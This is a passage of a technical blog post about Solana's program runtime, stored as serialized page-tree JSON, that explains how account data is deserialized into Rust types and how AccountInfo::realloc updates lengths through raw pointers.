data_len",{"type":25,"tag":216,"props":18944,"children":18945},{"style":6953},[18946],{"type":31,"value":6956},{"type":25,"tag":216,"props":18948,"children":18949},{"style":6953},[18950],{"type":31,"value":13773},{"type":25,"tag":216,"props":18952,"children":18953},{"style":6964},[18954],{"type":31,"value":1850},{"type":25,"tag":216,"props":18956,"children":18957},{"style":6947},[18958],{"type":31,"value":12319},{"type":25,"tag":216,"props":18960,"children":18961},{"style":6953},[18962],{"type":31,"value":179},{"type":25,"tag":216,"props":18964,"children":18965},{"style":7047},[18966],{"type":31,"value":13594},{"type":25,"tag":216,"props":18968,"children":18969},{"style":6964},[18970],{"type":31,"value":1850},{"type":25,"tag":216,"props":18972,"children":18973},{"style":6947},[18974],{"type":31,"value":17858},{"type":25,"tag":216,"props":18976,"children":18977},{"style":6964},[18978],{"type":31,"value":7036},{"type":25,"tag":216,"props":18980,"children":18981},{"style":6936},[18982],{"type":31,"value":12795},{"type":25,"tag":216,"props":18984,"children":18985},{"style":6953},[18986],{"type":31,"value":13773},{"type":25,"tag":216,"props":18988,"children":18989},{"style":6936},[18990],{"type":31,"value":13611},{"type":25,"tag":216,"props":18992,"children":18993},{"style":7375},[18994],{"type":31,"value":9811},{"type":25,"tag":216,"props":18996,"children":18997},{"style":6964},[18998],{"type":31,"value":7036},{"type":25,"tag":216,"props":19000,"children":19001},{"style":6936},[19002],{"type":31,"value":12795},{"type":25,"tag":216,"props":19004,"children":19005},{"style":7375},[19006],{"type":31,"value":17688},{"type":25,"tag":216,"props":19008,"children":19009},{"style":6964},[19010],{"type":31,"value":6967},{"type":25,"tag":216,"props":19012,"children":19013},{"class":6922,"line":6778},[19014,19018,19023,19028,19032,19036,19040],{"type":25,"tag":216,"props":19015,"children":19016},{"style":6947},[19017],{"type":31,"value":17858},{"type":25,"tag":216,"props":19019,"children":19020},{"style":6953},[19021],{"type":31,"value":19022}," +=",{"type":25,"tag":216,"props":19024,"children":19025},{"style":7047},[19026],{"type":31,"value":19027}," size_of",{"type":25,"tag":216,"props":19029,"children":19030},{"style":6953},[19031],{"type":31,"value":7438},{"type":25,"tag":216,"props":19033,"children":19034},{"style":6964},[19035],{"type":31,"value":9757},{"type":25,"tag":216,"props":19037,"children":19038},{"style":7375},[19039],{"type":31,"value":11994},{"type":25,"tag":216,"props":19041,"children":19042},{"style":6964},[19043],{"type":31,"value":12404},{"type":25,"tag":216,"props":19045,"children":19046},{"class":6922,"line":7005},[19047],{"type":25,"tag":216,"props":19048,"children":19049},{"emptyLinePlaceholder":16},[19050],{"type":31,"value":7642},{"type":25,"tag":216,"props":19052,"children":19053},{"class":6922,"line":7110},[19054,19058,19063,19067,19072,19076,19081,19086,19090,19094],{"type":25,"tag":216,"props":19055,"children":19056},{"style":6936},[19057],{"type":31,"value":15743},{"type":25,"tag":216,"props":19059,"children":19060},{"style":6947},[19061],{"type":31,"value":19062}," data",{"type":25,"tag":216,"props":19064,"children":19065},{"style":6953},[19066],{"type":31,"value":6956},{"type":25,"tag":216,"props":19068,"children":19069},{"style":7375},[19070],{"type":31,"value":19071}," Rc",{"type":25,"tag":216,"props":19073,"children":19074},{"style":6953},[19075],{"type":31,"value":7438},{"type":25,"tag":216,"props":19077,"children":19078},{"style":7047},[19079],{"type":31,"value":19080},"new",{"type":25,"tag":216,"props":19082,"children":19083},{"style":6964},[19084],{"type":31,"value":19085},"(RefCell",{"type":25,"tag":216,"props":19087,"children":19088},{"style":6953},[19089],{"type":31,"value":7438},{"type":25,"tag":216,"props":19091,"children":19092},{"style":7047},[19093],{"type":31,"value":19080},{"type":25,"tag":216,"props":19095,"children":19096},{"style":6964},[19097],{"type":31,"value":19098},"({\n",{"type":25,"tag":216,"props":19100,"children":19101},{"class":6922,"line":7216},[19102,19107,19111,19115,19119,19123,19127,19131,19135,19139],{"type":25,"tag":216,"props":19103,"children":19104},{"style":7047},[19105],{"type":31,"value":19106},"    from_raw_parts_mut",{"type":25,"tag":216,"props":19108,"children":19109},{"style":6964},[19110],{"type":31,"value":1850},{"type":25,"tag":216,"props":19112,"children":19113},{"style":6947},[19114],{"type":31,"value":12319},{"type":25,"tag":216,"props":19116,"children":19117},{"style":6953},[19118],{"type":31,"value":179},{"type":25,"tag":216,"props":19120,"children":19121},{"style":7047},[19122],{"type":31,"value":13594},{"type":25,"tag":216,"props":19124,"children":19125},{"style":6964},[19126],{"type":31,"value":1850},{"type":25,"tag":216,"props":19128,"children":19129},{"style":6947},[19130],{"type":31,"value":17858},{"type":25,"tag":216,"props":19132,"children":19133},{"style":6964},[19134],{"type":31,"value":5406},{"type":25,"tag":216,"props":19136,"children":19137},{"style":6947},[19138],{"type":31,"value":17763},{"type":25,"tag":216,"props":19140,"children":19141},{"style":6964},[19142],{"type":31,"value":7107},{"type":25,"tag":216,"props":19144,"children":19145},{"class":6922,"line":7244},[19146],{"type":25,"tag":216,"props":19147,"children":19148},{"style":6964},[19149],{"type":31,"value":19150},"}));\n",{"type":25,"tag":216,"props":19152,"children":19153},{"class":6922,"line":7257},[19154,19158,19162,19166,19170],{"type":25,"tag":216,"props":19155,"children":19156},{"style":6947},[19157],{"type":31,"value":17858},{"type":25,"tag":216,"props":19159,"children":19160},{"style":6953},[19161],{"type":31,"value":19022},{"type":25,"tag":216,"props":19163,"children":19164},{"style":6947},[19165],{"type":31,"value":18942},{"type":25,"tag":216,"props":19167,"children":19168},{"style":6953},[19169],{"type":31,"value":12858},{"type":25,"tag":216,"props":19171,"children":19172},{"style":6964},[19173],{"type":31,"value":19174}," MAX_PERMITTED_DATA_INCREASE;\n",{"type":25,"tag":216,"props":19176,"children":19177},{"class":6922,"line":7275},[19178,19182,19186,19190,19194,19198,19202,19206,19210,19214,19218,19223,19228],{"type":25,"tag":216,"props":19179,"children":19180},{"style":6947},[19181],{"type":31,"value":17858},{"type":25,"tag":216,"props":19183,"children":19184},{"style":6953},[19185],{"type":31,"value":19022},{"type":25,"tag":216,"props":19187,"children":19188},{"style":6964},[19189],{"type":31,"value":7016},{"type":25,"tag":216,"props":19191,"children":19192},{"style":6947},[19193],{"type":31,"value":17858},{"type":25,"tag":216,"props":19195,"children":19196},{"style":6936},[19197],{"type":31,"value":12781},{"type":25,"tag":216,"props":19199,"children":19200},{"style":6953},[19201],{"type":31,"value":13773},{"type":25,"tag":216,"props":19203,"children":19204},{"style":6936},[19205],{"type":31,"value":13611},{"type":25,"tag":216,"props":19207,"children":19208},{"style":7375},[19209],{"type":31,"value":18591},{"type":25,"tag":216,"props":19211,"children":19212},{"style":6964},[19213],{"type":31,"value":1888},{"type":25,"tag":216,"props":19215,"children":19216},{"style":6953},[19217],{"type":31,"value":179},{"type":25,"tag":216,"props":19219,"children":19220},{"style":7047},[19221],{"type":31,"value":19222},"align_offset",{"type":25,"tag":216,"props":19224,"children":19225},{"style":6964},[19226],{"type":31,"value":19227},"(BPF_ALIGN_OF_U128); ",{"type":25,"tag":216,"props":19229,"children":19230},{"style":6927},[19231],{"type":31,"value":19232},"// padding\n",{"type":25,"tag":38,"props":19234,"children":19235},{},[19236,19238,19243,19245,19251,19253,19264,19266,19271,19273,19279,19281,19287,19289,19295],{"type":31,"value":19237},"In English, we have the length of the data, as a ",{"type":25,"tag":82,"props":19239,"children":19241},{"className":19240},[],[19242],{"type":31,"value":11994},{"type":31,"value":19244},", followed immediately by the data, and an additional ",{"type":25,"tag":82,"props":19246,"children":19248},{"className":19247},[],[19249],{"type":31,"value":19250},"MAX_PERMITTED_DATA_INCREASE",{"type":31,"value":19252}," of reserve space (+ padding) after that. Using the length and data pointer, we construct a Rust slice reference (",{"type":25,"tag":162,"props":19254,"children":19257},{"href":19255,"rel":19256},"https://doc.rust-lang.org/std/slice/fn.from_raw_parts_mut.html",[166],[19258],{"type":25,"tag":82,"props":19259,"children":19261},{"className":19260},[],[19262],{"type":31,"value":19263},"slice::from_raw_parts_mut",{"type":31,"value":19265},") - slices are how Rust represents a, well, ",{"type":25,"tag":64,"props":19267,"children":19268},{},[19269],{"type":31,"value":19270},"slice",{"type":31,"value":19272}," (contiguous chunk) of memory - then wrap it up inside a ",{"type":25,"tag":82,"props":19274,"children":19276},{"className":19275},[],[19277],{"type":31,"value":19278},"Rc\u003CRefCell\u003CT>>",{"type":31,"value":19280},", giving us the unwieldy-looking type of ",{"type":25,"tag":82,"props":19282,"children":19284},{"className":19283},[],[19285],{"type":31,"value":19286},"AccountInfo.data",{"type":31,"value":19288},": ",{"type":25,"tag":82,"props":19290,"children":19292},{"className":19291},[],[19293],{"type":31,"value":19294},"Rc\u003CRefCell\u003C&mut [u8]>>",{"type":31,"value":179},{"type":25,"tag":38,"props":19297,"children":19298},{},[19299,19301,19308],{"type":31,"value":19300},"Now, what's the point of this complicated type? That's because when the same account is passed in multiple times to a program, instead of duplicating the data for the account, the BPF loader simply refers back to the first instance of the account. On the Rust side, that corresponds to ",{"type":25,"tag":162,"props":19302,"children":19305},{"href":19303,"rel":19304},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#335-336",[166],[19306],{"type":31,"value":19307},"cloning the referenced account",{"type":31,"value":1472},{"type":25,"tag":206,"props":19310,"children":19312},{"className":6915,"code":19311,"language":6914,"meta":7,"style":7},"// Duplicate account, clone the original\naccounts.push(accounts[dup_info as usize].clone());\n",[19313],{"type":25,"tag":82,"props":19314,"children":19315},{"__ignoreMap":7},[19316,19324],{"type":25,"tag":216,"props":19317,"children":19318},{"class":6922,"line":6923},[19319],{"type":25,"tag":216,"props":19320,"children":19321},{"style":6927},[19322],{"type":31,"value":19323},"// Duplicate account, clone the original\n",{"type":25,"tag":216,"props":19325,"children":19326},{"class":6922,"line":6769},[19327,19331,19335,19339,19343,19347,19351,19356,19360,19364,19369,19373,19378],{"type":25,"tag":216,"props":19328,"children":19329},{"style":6947},[19330],{"type":31,"value":18632},{"type":25,"tag":216,"props":19332,"children":19333},{"style":6953},[19334],{"type":31,"value":179},{"type":25,"tag":216,"props":19336,"children":19337},{"style":7047},[19338],{"type":31,"value":7783},{"type":25,"tag":216,"props":19340,"children":19341},{"style":6964},[19342],{"type":31,"value":1850},{"type":25,"tag":216,"props":19344,"children":19345},{"style":6947},[19346],{"type":31,"value":18632},{"type":25,"tag":216,"props":19348,"children":19349},{"style":6964},[19350],{"type":31,"value":7701},{"type":25,"tag":216,"props":19352,"children":19353},{"style":6947},[19354],{"type":31,"value":19355},"dup_info",{"type":25,"tag":216,"props":19357,"children":19358},{"style":6936},[19359],{"type":31,"value":12781},{"type":25,"tag":216,"props":19361,"children":19362},{"style":7375},[19363],{"type":31,"value":17688},{"type":25,"tag":216,"props":19365,"children":19366},{"style":6964},[19367],{"type":31,"value":19368},"]",{"type":25,"tag":216,"props":19370,"children":19371},{"style":6953},[19372],{"type":31,"value":179},{"type":25,"tag":216,"props":19374,"children":19375},{"style":7047},[19376],{"type":31,"value":19377},"clone",{"type":25,"tag":216,"props":19379,"children":19380},{"style":6964},[19381],{"type":31,"value":19382},"());\n",{"type":25,"tag":38,"props":19384,"children":19385},{},[19386,19388,19393,19395,19400,19402,19407,19409,19414,19415,19421,19423,19428,19430,19442,19444,19449],{"type":31,"value":19387},"Since ",{"type":25,"tag":82,"props":19389,"children":19391},{"className":19390},[],[19392],{"type":31,"value":7669},{"type":31,"value":19394}," inside the ",{"type":25,"tag":82,"props":19396,"children":19398},{"className":19397},[],[19399],{"type":31,"value":18896},{"type":31,"value":19401}," is a ",{"type":25,"tag":82,"props":19403,"children":19405},{"className":19404},[],[19406],{"type":31,"value":19278},{"type":31,"value":19408},", where the ",{"type":25,"tag":82,"props":19410,"children":19412},{"className":19411},[],[19413],{"type":31,"value":177},{"type":31,"value":19401},{"type":25,"tag":82,"props":19416,"children":19418},{"className":19417},[],[19419],{"type":31,"value":19420},"&mut [u8]",{"type":31,"value":19422}," pointing at the actual data buffer, when we clone the ",{"type":25,"tag":82,"props":19424,"children":19426},{"className":19425},[],[19427],{"type":31,"value":18896},{"type":31,"value":19429},", we get a new reference",{"type":25,"tag":19431,"props":19432,"children":19433},"sup",{},[19434],{"type":25,"tag":162,"props":19435,"children":19440},{"href":19436,"ariaDescribedBy":19437,"dataFootnoteRef":7,"id":19439},"#user-content-fn-rc-refs",[19438],"footnote-label","user-content-fnref-rc-refs",[19441],{"type":31,"value":184},{"type":31,"value":19443}," to the slice pointing at the ",{"type":25,"tag":64,"props":19445,"children":19446},{},[19447],{"type":31,"value":19448},"same",{"type":31,"value":19450}," data buffer.",{"type":25,"tag":38,"props":19452,"children":19453},{},[19454,19456,19462,19464,19470],{"type":31,"value":19455},"And of course to uphold borrowing rules while having a shared pointer, we have interior mutability via ",{"type":25,"tag":82,"props":19457,"children":19459},{"className":19458},[],[19460],{"type":31,"value":19461},"RefCell",{"type":31,"value":19463}," to check the rules at runtime. (The ",{"type":25,"tag":82,"props":19465,"children":19467},{"className":19466},[],[19468],{"type":31,"value":19469},"lamports",{"type":31,"value":19471}," field is very similar, for essentially the same reason - we need to be able to mutate it, but it is also shared between multiple instances of the same account.)",{"type":25,"tag":38,"props":19473,"children":19474},{},[19475,19477,19483],{"type":31,"value":19476},"Changing the data of an account is done by simply writing to ",{"type":25,"tag":82,"props":19478,"children":19480},{"className":19479},[],[19481],{"type":31,"value":19482},"AccountInfo::data",{"type":31,"value":19484},", which, as we just saw, is basically a pointer into the serialized buffer from the runtime; after the program exits, the loader reads the buffer back in to look at what the new state of the accounts should be.",{"type":25,"tag":38,"props":19486,"children":19487},{},[19488,19490,19497],{"type":31,"value":19489},"This is also where the ",{"type":25,"tag":162,"props":19491,"children":19494},{"href":19492,"rel":19493},"https://github.com/solana-labs/solana/blob/9fb0e76dc276f88b79720112477383a120c61b8f/program-runtime/src/pre_account.rs",[166],[19495],{"type":31,"value":19496},"runtime validity checks",{"type":31,"value":19498}," are imposed.",{"type":25,"tag":206,"props":19500,"children":19502},{"className":6915,"code":19501,"language":6914,"meta":7,"style":7},"// Only the owner may change account data\n//   and if the account is writable\n//   and if the account is not executable\nif !(program_id == pre.owner()\n    && is_writable  // line coverage used to get branch coverage\n    && !pre.executable())\n    && pre.data() != post.data()\n{\n    if pre.executable() {\n        return Err(InstructionError::ExecutableDataModified);\n    } else if is_writable {\n        return Err(InstructionError::ExternalAccountDataModified);\n    } else {\n        return Err(InstructionError::ReadonlyDataModified);\n    }\n}\n",[19503],{"type":25,"tag":82,"props":19504,"children":19505},{"__ignoreMap":7},[19506,19514,19522,19530,19572,19590,19619,19664,19671,19695,19730,19755,19787,19802,19834,19841],{"type":25,"tag":216,"props":19507,"children":19508},{"class":6922,"line":6923},[19509],{"type":25,"tag":216,"props":19510,"children":19511},{"style":6927},[19512],{"type":31,"value":19513},"// Only the owner may change account data\n",{"type":25,"tag":216,"props":19515,"children":19516},{"class":6922,"line":6769},[19517],{"type":25,"tag":216,"props":19518,"children":19519},{"style":6927},[19520],{"type":31,"value":19521},"//   and if the account is writable\n",{"type":25,"tag":216,"props":19523,"children":19524},{"class":6922,"line":6778},[19525],{"type":25,"tag":216,"props":19526,"children":19527},{"style":6927},[19528],{"type":31,"value":19529},"//   and if the account is not executable\n",{"type":25,"tag":216,"props":19531,"children":19532},{"class":6922,"line":7005},[19533,19538,19542,19546,19550,19554,19559,19563,19568],{"type":25,"tag":216,"props":19534,"children":19535},{"style":6973},[19536],{"type":31,"value":19537},"if",{"type":25,"tag":216,"props":19539,"children":19540},{"style":6953},[19541],{"type":31,"value":16820},{"type":25,"tag":216,"props":19543,"children":19544},{"style":6964},[19545],{"type":31,"value":1850},{"type":25,"tag":216,"props":19547,"children":19548},{"style":6947},[19549],{"type":31,"value":18623},{"type":25,"tag":216,"props":19551,"children":19552},{"style":6953},[19553],{"type":31,"value":7232},{"type":25,"tag":216,"props":19555,"children":19556},{"style":6947},[19557],{"type":31,"value":19558}," pre",{"type":25,"tag":216,"props":19560,"children":19561},{"style":6953},[19562],{"type":31,"value":179},{"type":25,"tag":216,"props":19564,"children":19565},{"style":7047},[19566],{"type":31,"value":19567},"owner",{"type":25,"tag":216,"props":19569,"children":19570},{"style":6964},[19571],{"type":31,"value":11687},{"type":25,"tag":216,"props":19573,"children":19574},{"class":6922,"line":7110},[19575,19580,19585],{"type":25,"tag":216,"props":19576,"children":19577},{"style":6953},[19578],{"type":31,"value":19579},"    &&",{"type":25,"tag":216,"props":19581,"children":19582},{"style":6947},[19583],{"type":31,"value":19584}," is_writable",{"type":25,"tag":216,"props":19586,"children":19587},{"style":6927},[19588],{"type":31,"value":19589},"  // line coverage used to get branch coverage\n",{"type":25,"tag":216,"props":19591,"children":19592},{"class":6922,"line":7216},[19593,19597,19601,19605,19609,19614],{"type":25,"tag":216,"props":19594,"children":19595},{"style":6953},[19596],{"type":31,"value":19579},{"type":25,"tag":216,"props":19598,"children":19599},{"style":6953},[19600],{"type":31,"value":16820},{"type":25,"tag":216,"props":19602,"children":19603},{"style":6947},[19604],{"type":31,"value":206},{"type":25,"tag":216,"props":19606,"children":19607},{"style":6953},[19608],{"type":31,"value":179},{"type":25,"tag":216,"props":19610,"children":19611},{"style":7047},[19612],{"type":31,"value":19613},"executable",{"type":25,"tag":216,"props":19615,"children":19616},{"style":6964},[19617],{"type":31,"value":19618},"())\n",{"type":25,"tag":216,"props":19620,"children":19621},{"class":6922,"line":7244},[19622,19626,19630,19634,19638,19642,19647,19652,19656,19660],{"type":25,"tag":216,"props":19623,"children":19624},{"style":6953},[19625],{"type":31,"value":19579},{"type":25,"tag":216,"props":19627,"children":19628},{"style":6947},[19629],{"type":31,"value":19558},{"type":25,"tag":216,"props":19631,"children":19632},{"style":6953},[19633],{"type":31,"value":179},{"type":25,"tag":216,"props":19635,"children":19636},{"style":7047},[19637],{"type":31,"value":7669},{"type":25,"tag":216,"props":19639,"children":19640},{"style":6964},[19641],{"type":31,"value":18000},{"type":25,"tag":216,"props":19643,"children":19644},{"style":6953},[19645],{"type":31,"value":19646},"!=",{"type":25,"tag":216,"props":19648,"children":19649},{"style":6947},[19650],{"type":31,"value":19651}," post",{"type":25,"tag":216,"props":19653,"children":19654},{"style":6953},[19655],{"type":31,"value":179},{"type":25,"tag":216,"props":19657,"children":19658},{"style":7047},[19659],{"type":31,"value":7669},{"type":25,"tag":216,"props":19661,"children":19662},{"style":6964},[19663],{"type":31,"value":11687},{"type":25,"tag":216,"props":19665,"children":19666},{"class":6922,"line":7257},[19667],{"type":25,"tag":216,"props":19668,"children":19669},{"style":6964},[19670],{"type":31,"value":14836},{"type":25,"tag":216,"props":19672,"children":19673},{"class":6922,"line":7275},[19674,19678,19682,19686,19690],{"type":25,"tag":216,"props":19675,"children":19676},{"style":6973},[19677],{"type":31,"value":16235},{"type":25,"tag":216,"props":19679,"children":19680},{"style":6947},[19681],{"type":31,"value":19558},{"type":25,"tag":216,"props":19683,"children":19684},{"style":6953},[19685],{"type":31,"value":179},{"type":25,"tag":216,"props":19687,"children":19688},{"style":7047},[19689],{"type":31,"value":19613},{"type":25,"tag":216,"props":19691,"children":19692},{"style":6964},[19693],{"type":31,"value":19694},"() {\n",{"type":25,"tag":216,"props":19696,"children":19697},{"class":6922,"line":7296},[19698,19703,19708,19712,19717,19721,19726],{"type":25,"tag":216,"props":19699,"children":19700},{"style":6973},[19701],{"type":31,"value":19702},"        return",{"type":25,"tag":216,"props":19704,"children":19705},{"style":7375},[19706],{"type":31,"value":19707}," Err",{"type":25,"tag":216,"props":19709,"children":19710},{"style":6964},[19711],{"type":31,"value":1850},{"type":25,"tag":216,"props":19713,"children":19714},{"style":7375},[19715],{"type":31,"value":19716},"InstructionError",{"type":25,"tag":216,"props":19718,"children":19719},{"style":6953},[19720],{"type":31,"value":7438},{"type":25,"tag":216,"props":19722,"children":19723},{"style":7375},[19724],{"type":31,"value":19725},"ExecutableDataModified",{"type":25,"tag":216,"props":19727,"children":19728},{"style":6964},[19729],{"type":31,"value":7797},{"type":25,"tag":216,"props":19731,"children":19732},{"class":6922,"line":7305},[19733,19738,19742,19747,19751],{"type":25,"tag":216,"props":19734,"children":19735},{"style":6964},[19736],{"type":31,"value":19737},"    } ",{"type":25,"tag":216,"props":19739,"children":19740},{"style":6973},[19741],{"type":31,"value":7268},{"type":25,"tag":216,"props":19743,"children":19744},{"style":6973},[19745],{"type":31,"value":19746}," if",{"type":25,"tag":216,"props":19748,"children":19749},{"style":6947},[19750],{"type":31,"value":19584},{"type":25,"tag":216,"props":19752,"children":19753},{"style":6964},[19754],{"type":31,"value":7241},{"type":25,"tag":216,"props":19756,"children":19757},{"class":6922,"line":7557},[19758,19762,19766,19770,19774,19778,19783],{"type":25,"tag":216,"props":19759,"children":19760},{"style":6973},[19761],{"type":31,"value":19702},{"type":25,"tag":216,"props":19763,"children":19764},{"style":7375},[19765],{"type":31,"value":19707},{"type":25,"tag":216,"props":19767,"children":19768},{"style":6964},[19769],{"type":31,"value":1850},{"type":25,"tag":216,"props":19771,"children":19772},{"style":7375},[19773],{"type":31,"value":19716},{"type":25,"tag":216,"props":19775,"children":19776},{"style":6953},[19777],{"type":31,"value":7438},{"type":25,"tag":216,"props":19779,"children":19780},{"style":7375},[19781],{"type":31,"value":19782},"ExternalAccountDataModified",{"type":25,"tag":216,"props":19784,"children":19785},{"style":6964},[19786],{"type":31,"value":7797},{"type":25,"tag":216,"props":19788,"children":19789},{"class":6922,"line":7574},[19790,19794,19798],{"type":25,"tag":216,"props":19791,"children":19792},{"style":6964},[19793],{"type":31,"value":19737},{"type":25,"tag":216,"props":19795,"children":19796},{"style":6973},[19797],{"type":31,"value":7268},{"type":25,"tag":216,"props":19799,"children":19800},{"style":6964},[19801],{"type":31,"value":7241},{"type":25,"tag":216,"props":19803,"children":19804},{"class":6922,"line":7591},[19805,19809,19813,19817,19821,19825,19830],{"type":25,"tag":216,"props":19806,"children":19807},{"style":6973},[19808],{"type":31,"value":19702},{"type":25,"tag":216,"props":19810,"children":19811},{"style":7375},[19812],{"type":31,"value":19707},{"type":25,"tag":216,"props":19814,"children":19815},{"style":6964},[19816],{"type":31,"value":1850},{"type":25,"tag":216,"props":19818,"children":19819},{"style":7375},[19820],{"type":31,"value":19716},{"type":25,"tag":216,"props":19822,"children":19823},{"style":6953},[19824],{"type":31,"value":7438},{"type":25,"tag":216,"props":19826,"children":19827},{"style":7375},[19828],{"type":31,"value":19829},"ReadonlyDataModified",{"type":25,"tag":216,"props":19831,"children":19832},{"style":6964},[19833],{"type":31,"value":7797},{"type":25,"tag":216,"props":19835,"children":19836},{"class":6922,"line":7604},[19837],{"type":25,"tag":216,"props":19838,"children":19839},{"style":6964},[19840],{"type":31,"value":7311},{"type":25,"tag":216,"props":19842,"children":19843},{"class":6922,"line":7613},[19844],{"type":25,"tag":216,"props":19845,"children":19846},{"style":6964},[19847],{"type":31,"value":7874},{"type":25,"tag":606,"props":19849,"children":19851},{"id":19850},"back-to-realloc",[19852,19854],{"type":31,"value":19853},"Back to ",{"type":25,"tag":82,"props":19855,"children":19857},{"className":19856},[],[19858],{"type":31,"value":17595},{"type":25,"tag":38,"props":19860,"children":19861},{},[19862],{"type":31,"value":19863},"As a reminder, this is what we were looking at before that detour:",{"type":25,"tag":206,"props":19865,"children":19866},{"className":6915,"code":18348,"language":6914,"meta":7,"style":7},[19867],{"type":25,"tag":82,"props":19868,"children":19869},{"__ignoreMap":7},[19870,19877,19964],{"type":25,"tag":216,"props":19871,"children":19872},{"class":6922,"line":6923},[19873],{"type":25,"tag":216,"props":19874,"children":19875},{"style":6927},[19876],{"type":31,"value":18360},{"type":25,"tag":216,"props":19878,"children":19879},{"class":6922,"line":6769},[19880,19884,19888,19892,19896,19900,19904,19908,19912,19916,19920,19924,19928,19932,19936,19940,19944,19948,19952,19956,19960],{"type":25,"tag":216,"props":19881,"children":19882},{"style":6936},[19883],{"type":31,"value":15743},{"type":25,"tag":216,"props":19885,"children":19886},{"style":6947},[19887],{"type":31,"value":17814},{"type":25,"tag":216,"props":19889,"children":19890},{"style":6953},[19891],{"type":31,"value":6956},{"type":25,"tag":216,"props":19893,"children":19894},{"style":6936},[19895],{"type":31,"value":17754},{"type":25,"tag":216,"props":19897,"children":19898},{"style":6953},[19899],{"type":31,"value":179},{"type":25,"tag":216,"props":19901,"children":19902},{"style":7047},[19903],{"type":31,"value":17831},{"type":25,"tag":216,"props":19905,"children":19906},{"style":6964},[19907],{"type":31,"value":17836},{"type":25,"tag":216,"props":19909,"children":19910},{"style":6953},[19911],{"type":31,"value":7081},{"type":25,"tag":216,"props":19913,"children":19914},{"style":7047},[19915],{"type":31,"value":17845},{"type":25,"tag":216,"props":19917,"children":19918},{"style":6964},[19919],{"type":31,"value":17836},{"type":25,"tag":216,"props":19921,"children":19922},{"style":6953},[19923],{"type":31,"value":179},{"type":25,"tag":216,"props":19925,"children":19926},{"style":7047},[19927],{"type":31,"value":17858},{"type":25,"tag":216,"props":19929,"children":19930},{"style":6964},[19931],{"type":31,"value":1850},{"type":25,"tag":216,"props":19933,"children":19934},{"style":6953},[19935],{"type":31,"value":8276},{"type":25,"tag":216,"props":19937,"children":19938},{"style":6989},[19939],{"type":31,"value":8031},{"type":25,"tag":216,"props":19941,"children":19942},{"style":6964},[19943],{"type":31,"value":7036},{"type":25,"tag":216,"props":19945,"children":19946},{"style":6936},[19947],{"type":31,"value":12795},{"type":25,"tag":216,"props":19949,"children":19950},{"style":6953},[19951],{"type":31,"value":13773},{"type":25,"tag":216,"props":19953,"children":19954},{"style":6936},[19955],{"type":31,"value":7691},{"type":25,"tag":216,"props":19957,"children":19958},{"style":7375},[19959],{"type":31,"value":9811},{"type":25,"tag":216,"props":19961,"children":19962},{"style":6964},[19963],{"type":31,"value":6967},{"type":25,"tag":216,"props":19965,"children":19966},{"class":6922,"line":6778},[19967,19971,19975,19979,19983,19987,19991],{"type":25,"tag":216,"props":19968,"children":19969},{"style":6953},[19970],{"type":31,"value":8519},{"type":25,"tag":216,"props":19972,"children":19973},{"style":6947},[19974],{"type":31,"value":17906},{"type":25,"tag":216,"props":19976,"children":19977},{"style":6953},[19978],{"type":31,"value":6956},{"type":25,"tag":216,"props":19980,"children":19981},{"style":6947},[19982],{"type":31,"value":17915},{"type":25,"tag":216,"props":19984,"children":19985},{"style":6936},[19986],{"type":31,"value":12781},{"type":25,"tag":216,"props":19988,"children":19989},{"style":7375},[19990],{"type":31,"value":9811},{"type":25,"tag":216,"props":19992,"children":19993},{"style":6964},[19994],{"type":31,"value":6967},{"type":25,"tag":38,"props":19996,"children":19997},{},[19998,20003,20005,20010,20012,20017,20019,20030,20032,20037,20039,20044],{"type":25,"tag":82,"props":19999,"children":20001},{"className":20000},[],[20002],{"type":31,"value":17831},{"type":31,"value":20004}," gives us the ",{"type":25,"tag":82,"props":20006,"children":20008},{"className":20007},[],[20009],{"type":31,"value":19420},{"type":31,"value":20011}," from the ",{"type":25,"tag":82,"props":20013,"children":20015},{"className":20014},[],[20016],{"type":31,"value":19294},{"type":31,"value":20018},", whose data is inside the serialized buffer and immediately after the size of the data inside the serialized buffer. And ",{"type":25,"tag":162,"props":20020,"children":20023},{"href":20021,"rel":20022},"https://doc.rust-lang.org/std/primitive.slice.html#method.as_mut_ptr",[166],[20024],{"type":25,"tag":82,"props":20025,"children":20027},{"className":20026},[],[20028],{"type":31,"value":20029},"slice::as_mut_ptr()",{"type":31,"value":20031}," gives us that data pointer directly. So, this code computes a pointer to that serialized size field (8 bytes - the size of a ",{"type":25,"tag":82,"props":20033,"children":20035},{"className":20034},[],[20036],{"type":31,"value":11994},{"type":31,"value":20038}," - behind the data buffer), and then writes ",{"type":25,"tag":82,"props":20040,"children":20042},{"className":20041},[],[20043],{"type":31,"value":17679},{"type":31,"value":20045}," to it.",{"type":25,"tag":38,"props":20047,"children":20048},{},[20049,20051,20063,20065,20071],{"type":31,"value":20050},"This is reasonable... ",{"type":25,"tag":64,"props":20052,"children":20053},{},[20054,20056,20061],{"type":31,"value":20055},"as long as the ",{"type":25,"tag":82,"props":20057,"children":20059},{"className":20058},[],[20060],{"type":31,"value":7669},{"type":31,"value":20062}," actually came from the serialized buffer",{"type":31,"value":20064},". We'll come back to this ",{"type":25,"tag":162,"props":20066,"children":20068},{"href":20067},"#Not-contracts",[20069],{"type":31,"value":20070},"later",{"type":31,"value":179},{"type":25,"tag":38,"props":20073,"children":20074},{},[20075,20077,20082],{"type":31,"value":20076},"At this point we've updated the serialized buffer, so at exit the runtime will understand that the size of the account's data buffer has changed. However, we haven't dealt with the Rust side yet. Slices have a length, and we haven't dealt with the ",{"type":25,"tag":82,"props":20078,"children":20080},{"className":20079},[],[20081],{"type":31,"value":19420},{"type":31,"value":20083}," slice that is our view into the data from the Rust world. So let's look at the next chunk:",{"type":25,"tag":206,"props":20085,"children":20087},{"className":6915,"code":20086,"language":6914,"meta":7,"style":7},"// Then set the new length in the local slice\nlet ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n*ptr = new_len as u64;\n",[20088],{"type":25,"tag":82,"props":20089,"children":20090},{"__ignoreMap":7},[20091,20099,20226],{"type":25,"tag":216,"props":20092,"children":20093},{"class":6922,"line":6923},[20094],{"type":25,"tag":216,"props":20095,"children":20096},{"style":6927},[20097],{"type":31,"value":20098},"// Then set the new length in the local 